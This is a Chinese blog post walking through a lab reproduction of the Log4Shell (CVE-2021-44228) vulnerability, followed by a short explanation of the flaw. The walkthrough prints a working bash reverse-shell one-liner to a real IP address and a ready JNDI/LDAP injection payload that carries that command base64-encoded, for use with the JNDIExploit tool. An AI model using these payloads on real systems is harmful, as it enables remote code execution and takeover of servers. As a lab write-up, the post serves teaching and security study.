log4j

24 年 5 月 26 日 星期日
392 字
2 分钟

Log4j漏洞复现

实战


log4j本身会解析JNDI。攻击者可以直接在JNDI注入代码,从而实现远程代码执行

这里我使用已经搭建好的靶场进行试验

这里写了个反弹shell的playload 命令:

text
bash -i >& /dev/tcp/106.53.39.247/23172 0>&1

采用JDNI注入脚本 JNDIExploit-1.2-SNAPSHOT.jar

需要进行base64加密

在服务器终端上开启恶意代码的端口

另一个终端上开启监听

构造出我们的playload

text
${jndi:ldap://106.53.39.247:1389/Basic/Command/Base64/c2ggLWkgPiYgL2Rldi90Y3AvMTA2LjUzLjM5LjI0Ny8yMzE3MiAwPiYx}

即可完成反弹shell

简介

log4j全名就是(log for java),就是apache的一个开源的日志记录组件 ,它在Java项目中使用的比较广泛。

Log4j漏洞,特别是被称为“Log4Shell”的漏洞(CVE-2021-44228),是一个严重的安全漏洞,出现在Apache Log4j 2这个广泛使用的Java日志库中。该漏洞于2021年12月被公开披露,并迅速成为全球网络安全的重大威胁。

Log4Shell允许攻击者通过特制的日志消息来远程执行代码(RCE)。该漏洞的核心问题在于Log4j 2的某些版本会在日志消息中解析JNDI(Java Naming and Directory Interface)查找语法,这使得攻击者可以通过在日志消息中注入恶意的JNDI查找请求来执行任意代码。例如,攻击者可以在一个普通的日志消息中包含类似${jndi:ldap://attacker.com/a}的字符串,Log4j 2会解析并执行这个请求,导致远程代码执行。

文章标题:log4j

文章作者:huarui

文章链接:https://54huarui.online/posts/log4j[复制]

最后修改时间:


商业转载请联系站长获得授权,非商业转载请注明本文出处及文章链接,您可以自由地在任何媒体以任何形式复制和分发作品,也可以修改和创作,但是分发衍生作品时必须采用相同的许可协议。
本文采用CC BY-NC-SA 4.0进行许可。